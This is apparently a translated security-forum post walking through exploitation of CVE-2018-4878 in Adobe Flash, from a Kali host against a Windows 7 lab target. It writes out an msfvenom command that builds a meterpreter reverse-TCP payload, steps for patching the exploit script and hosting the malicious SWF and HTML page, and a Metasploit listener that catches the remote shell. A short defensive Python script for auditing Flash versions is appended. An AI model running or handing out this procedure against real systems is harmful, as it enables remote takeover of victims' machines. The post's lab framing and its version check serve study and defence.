[SAFE-ID: JIWO-2024-2520] Author: future Posted: [2019-12-12]
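Flash 0day vulnerability
1. Vulnerability overview
On February 1, 2018, Adobe published a security advisory (APSA18-01) stating that Adobe Flash 28.0.0.137 and earlier versions contain a high-severity vulnerability (CVE-2018-4878). An attacker crafts a special Flash link; when a user opens that link through a browser, email, or Office, the result is "remote code execution" and the attacker directly obtains a shell.
Target: Windows 7 SP1    Kali: 192.168.43.16
Requirements: Adobe Flash 28.0.0.137 or earlier; IE8 or earlier
1. In Kali, open a terminal, locate the downloaded cve-2018-4878 tool, and change to that directory.
2. Run <msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.16 LPORT=4444 -f python>shellcode.txt> to generate shellcode.txt, where the shellcode for the Kali host can be viewed.
3. View the shellcode and use it to replace the original shellcode in cve-2018-4878.
4. Edit cve-2018-4878.py: substitute the shellcode just viewed, change to stageless = False (originally True), and change the paths in the two fopen calls to the paths where exploit.swf and index.html are to be generated.
5. Run cve-2018-4878.py to generate the exploit.swf and index.html that will be used.
6. Start the apache2 service and copy the two files into the Apache web path: <cp index.html /var/www/html/index.html> <cp exploit.swf /var/www/html/exploit.swf>
7. Open msfconsole, use the listener module <use multi/handler>, load a payload <set payload windows/meterpreter/reverse_tcp>, set the parameters to the Kali IP and the port used when generating the shellcode, then run exploit.
8. When the target visits http://192.168.43.16/index.html with a browser and Adobe Flash affected by cve-2018-4878, a shell on the target is obtained.
As can be seen, the meterpreter session has connected back; you only need to type to get a shell.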
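The affected range stated in the overview (Adobe Flash 28.0.0.137 and earlier) can be checked against a software inventory. The following is an added example, not part of the original post: the tab-separated inventory format, the host names and the function names are assumptions, and it accepts both dotted versions and the comma-separated form Flash Player reports about itself (for example "WIN 28,0,0,137").

```python
import re

# Last affected build, taken from the advisory text quoted on this page.
LAST_AFFECTED = (28, 0, 0, 137)

_VERSION_RE = re.compile(r"(\d+)[.,](\d+)[.,](\d+)[.,](\d+)")


def parse_flash_version(text):
    """Return a 4-tuple of ints, or None if no four-part version is found.

    Accepts '28.0.0.137', '28,0,0,137' and 'WIN 28,0,0,137'.
    """
    m = _VERSION_RE.search(text)
    return tuple(int(p) for p in m.groups()) if m else None


def is_affected(version_text):
    """True/False for a parsable version, None when it cannot be parsed."""
    v = parse_flash_version(version_text)
    if v is None:
        return None
    # Tuple comparison is numeric per component, so 9.x sorts below 28.x
    # (a plain string comparison would get this wrong).
    return v <= LAST_AFFECTED


def audit(inventory_lines):
    """Split 'host<TAB>version' lines into affected, ok and unparsed hosts."""
    result = {"affected": [], "ok": [], "unparsed": []}
    for line in inventory_lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        host, _, version = line.partition("\t")
        verdict = is_affected(version)
        key = "unparsed" if verdict is None else ("affected" if verdict else "ok")
        result[key].append(host)
    return result


# Constructed sample inventory (hypothetical hosts, not from the original post).
SAMPLE = [
    "# host\tflash_version",
    "ws-01\t28.0.0.137",
    "ws-02\tWIN 27,0,0,187",
    "ws-03\t28.0.0.161",
    "ws-04\tnot installed",
    "ws-05\t9.0.124.0",
]

if __name__ == "__main__":
    for status, hosts in audit(SAMPLE).items():
        print(status, hosts)
```

Hosts that land in "unparsed" need a manual look rather than being treated as clean.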